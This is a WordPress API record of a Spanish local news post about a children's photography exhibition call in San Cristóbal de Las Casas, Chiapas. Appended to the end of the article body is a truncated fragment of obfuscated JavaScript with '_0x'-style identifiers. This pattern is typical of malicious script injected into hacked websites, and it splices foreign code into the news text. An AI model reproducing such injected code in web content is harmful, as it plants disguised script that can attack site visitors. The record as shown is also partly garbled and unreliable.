{"id":6947,"date":"2022-11-25T03:22:52","date_gmt":"2022-11-25T03:22:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6947"},"modified":"2022-11-25T03:22:52","modified_gmt":"2022-11-25T03:22:52","slug":"preparan-exposicion-de-fotografia-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6947","title":{"rendered":"Preparan exposici\u00f3n de fotograf\u00eda en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221124-WA0148-1024x768.jpg\" alt=\"\" class=\"wp-image-6948\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221124-WA0148-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221124-WA0148-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221124-WA0148-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221124-WA0148.jpg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">J<\/figcaption><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal 24 de Noviembre del 2022. San Crist\u00f3bal de Las Casas.- Integrantes del Colectivo Tr\u00e1game Luz dieron a conocer que dentro del XXI Festival de Fotograf\u00eda realizar\u00e1n una exposici\u00f3n fotogr\u00e1fica infantil, por lo que han lanzado una convocatoria para que los interesados puedan enviar su trabajo hasta el 28 de noviembre y ser seleccionados para la muestra que se har\u00e1 en el Centro Cultural del Carmen el 30 de este mismo mes.En entrevista, dijeron que podr\u00e1n participar ni\u00f1as y ni\u00f1os de 5 a 12 a\u00f1os de edad y pueden comunicarse con Alan Fuentes al 967 103 59 01, para que env\u00eden sus trabajos originales y las im\u00e1genes pueden ser tomadas con cualquier c\u00e1mara digital o dispositivo m\u00f3vil, \u201cla tem\u00e1tica a desarrollar es Describe tu Entorno\u201d.\u201cEl autor deber\u00e1 describir el entorno en el que se desenvuelve a trav\u00e9s de las fotograf\u00edas. Cada participante podr\u00e1 enviar de 1 a 3, impresas en 8&#215;10 pulgadas que es el tama\u00f1o carta, la fecha l\u00edmite de entrega es este 28 de noviembre, ya que la exposici\u00f3n se realizar\u00e1 el d\u00eda 30 en el Centro Cultural del Carmen\u201d.Asimismo, dijeron que este festival se hace para conmemorar los 21 a\u00f1os del Colectivo Tr\u00e1game Luz, el cual empez\u00f3 con el nombre de Fot\u00f3grafos Independientes, por lo que cada a\u00f1o se organiza esto que conlleva a diferentes actividades relacionadas con la fotograf\u00eda, como exposiciones, talleres, conversatorios.\u201cEmpieza el 30 de noviembre y termina el 4 de diciembre, fue el a\u00f1o pasado que se hace la primera vez la exposici\u00f3n infantil, se abre espacio a la infancia para que nos compartan su mirada, con la finalidad de incluir a los ni\u00f1os en espacios culturales y art\u00edsticos, ellos tienen discursos, cosas que contar, qu\u00e9 decirnos, es la segunda exposici\u00f3n con la finalidad de impulsar a las infancias para que empiecen a poner atenci\u00f3n en espacios art\u00edsticos\u201d, finalizaron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>J \u00d3scar G\u00f3mez\/ Corresponsal 24 de Noviembre del 2022. San Crist\u00f3bal de Las Casas.- Integrantes del Colectivo Tr\u00e1game Luz dieron a conocer que dentro del XXI Festival de Fotograf\u00eda realizar\u00e1n una exposici\u00f3n fotogr\u00e1fica infantil, por lo que han lanzado una convocatoria para que los interesados puedan enviar su trabajo hasta el 28 de noviembre y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6947","post","type-post","status-publish","format-standard","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6947"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6947\/revisions"}],"predecessor-version":[{"id":6949,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6947\/revisions\/6949"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}